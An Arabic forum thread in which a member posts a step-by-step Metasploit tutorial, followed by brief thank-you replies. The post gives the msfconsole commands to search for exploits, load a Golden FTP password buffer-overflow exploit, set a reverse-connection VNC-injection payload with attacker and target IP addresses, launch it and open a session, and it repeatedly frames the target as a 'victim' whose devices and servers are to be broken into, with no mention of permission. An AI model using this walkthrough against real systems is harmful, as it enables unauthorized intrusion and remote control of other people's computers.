قديم 11-25-2011, 07:10 AM   المشاركة رقم: 1
الكاتب
ولد رفحاء
.:: عضو ::.
المعلومات  
التسجيل: Oct 2010
العضوية: 73021
المشاركات: 134
بمعدل : 0.05 يوميا
الإتصال ولد رفحاء غير متواجد حالياً


المنتدى  
افتراضي Me ta Spl oit

السلام عليكم ورحمة الله وبركاته



اولا سنتكلم عن مشرووع كبير جدا


وهوو من افضل المشاريع المساعدة على اكتشاف الثغرات وستغلالها



ساحول ان اجمع معضم الطرق للفحص وتعمل مع المشرووع بشكل منظم وقد يفيد الاخوان



وسنحلل امهم الاوامر التي تساعد على اختراق الاجهزة والسيرفرات ..(^_^)


وسنتكتشف كيف نعرف الثغرات المدرجة وتعامل معها



بسم الله نبدأ

نفتح سطر الاوامر ونسجل .

كود:
msfconsole
بعد تسجيل الامر تنتظر فتره






معطيك معلومات كثيره راح نتطرق اليها بشرح


الان انت حاب تعرف الثغرات الموجودة في الميتا

تسجل هذا الامر .

اقتباس:
msf > show exploits
مثل ماهوو موضح بصورة





كما قلت قبل فتره الاداوت الموجوده بالباك تراك تحتاج خبره شوي لانك راح تواجه

كثير من الواقف الي راح تعملك صعوبه

طيب شفت الثغرات كثيره شوي ونت حاب تبحث عن ثغره ببرنامج معين عارف انه عند الضيحة شغال

سوئا جهاز او سيرفر ... (^_^)

تدخل هذا الامر

كود:
msf > search xxx
غير الاكسات بالبرنامج الي تبي تفحصه

راح يطلع معك ثغرات واجد انت حاول تستغل الافضل لك ..(^_^)

بس اعلم ان فيه اجهزه عليها حمايات تمنعك من تنفيذ الثغرة او الاستفادة منها


بعد ماتختار الثغرة المناسبة تعينها بالامر هذا ...

كود:
msf > use  exploit/windows/ftp/goldenftp_pass_bof
حاول انت انك تستغل الثغرة المناسبة انا اخترت ثغرة

معينة انت اظف use

وختر الثغرة المناسبة لك .. (^_^)



وذا حاب تعرف خيارات الثغرة والخصائص التي يجب تطيقها على الثغره تكتب الامر

كود:
 >  info
الان بعد ماطلعت على المعلومات حاب تعرف البايلود المتاح لثغرة تسجل هذا الامر


كود:
> show payloads
بعد تسجيل الامر راح يعطيك اكثر من بايلود حاول تختار الانسب للك ... (^_^)

تسجل هذا الامر


كود:
set payload windows/vncinject/reverse_http
بعد تثبت البايلود


تدخل هذا الامر لمعرفة المطلوب منك من الثغرة ..(^_^)

كود:
show options
بعد ماندخلة راح تطلع عندك خيارات الثغرة

سجل الخيارات المطلوبه

على حسب الخيارات المطلوبه

ولكن اغلب الخيارات كتالي ..


اقتباس:
set lhost 192.168.8.93 --> هنا مطلوب منك ايبي الخاص بك اذا الاختراق داخل الشبكه ضع الايبي الخاص بالشبكة وذا خارج الشبكه ضع الايبي الحقيقي او الهوست


set lport 443 --> البورت الذي تريد ادخاله لعمل اتصال عكسي مع الضحيه


set rhost 192.168.8.94 --> ايبي الهدف سوى داخل وخارج



كثير متطلبات الثغرات فتختلف كتابت ثغرة عن ثغرة وتختلف متطلبات ثغره عن ثغرة


بعد الانتهاء من تعيين متطلبات الثغرات

تسجل امر الاستغلال

اقتباس:
exploit
بعد تسجيل امر الاستغلال

اذا كانت اعداداتك سليمه فأنك ستتصل لاضيحه الذي اخترته .. (^_^)

بهذا الامر ..

اقتباس:
msf > sessions -i 1
الى هنا نققف ونكمل الجزء التاني بعد اسبوع انشالله

وسيكون الجزء الثاني التحكم بالضيحه باكثر من طريقة ونشالله راح يكون الشرح صور

..(^_^)


نصيحة قبل الدخول بالميتا والباك تراك بشكل عام :


هذي نصيحة من انسان متواضع الى انسان متواضع اذا

حيبت تنجح بالميتا والباك تراك بشكل عام

1- خذ وقتك بالتعلم على الوندز

2- تعلم على توزيعه سهل من توزيعات اللينكس

3- تعلم لغة برمجه او حاول انت تكون ملم ببعض لغات البرمجة

لن تستطيع الاختراق مازلة لم تستمع لماقلته لك


وخيرأ

السلام عليكم ورحمة الله وبركاته ...





































توقيع : ولد رفحاء

جميل هو التواضع

عرض البوم صور ولد رفحاء   رد مع اقتباس

قديم 11-25-2011, 07:15 AM   المشاركة رقم: 2
الكاتب
ولد رفحاء
.:: عضو ::.
المعلومات  
التسجيل: Oct 2010
العضوية: 73021
المشاركات: 134
بمعدل : 0.05 يوميا
الإتصال ولد رفحاء غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

على فكره اي استفسار بالميتا اطرحه هنا ونشالله اجاوب عليك .. (^_^)












توقيع : ولد رفحاء

جميل هو التواضع

عرض البوم صور ولد رفحاء   رد مع اقتباس

قديم 11-25-2011, 12:19 PM   المشاركة رقم: 3
الكاتب
عمر الجهني
.:: عضو ::.
المعلومات  
التسجيل: Jul 2010
العضوية: 61456
المشاركات: 133
بمعدل : 0.04 يوميا
الإتصال عمر الجهني غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

مشكور على الشرح الجميل والسلسل

والله يعينك ويجعلها في موازين حسناتك

تقبل مروري












عرض البوم صور عمر الجهني   رد مع اقتباس

قديم 05-13-2015, 08:31 AM   المشاركة رقم: 4
الكاتب
أخت ترمدول
.:: عضو ::.
 
الصورة الرمزية أخت ترمدول
المعلومات  
التسجيل: May 2015
العضوية: 206385
المشاركات: 64
بمعدل : 0.05 يوميا
الإتصال أخت ترمدول غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

مشكور أخوى على الشرح

و ان شاء الله أستفيد منة













عرض البوم صور أخت ترمدول   رد مع اقتباس

إضافة رد

مواقع النشر (المفضلة)


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


الساعة الآن 02:53 AM.


Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.